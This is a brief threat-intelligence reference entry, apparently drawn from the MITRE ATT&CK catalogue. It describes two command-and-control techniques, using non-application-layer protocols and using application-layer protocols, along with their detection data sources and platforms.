Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre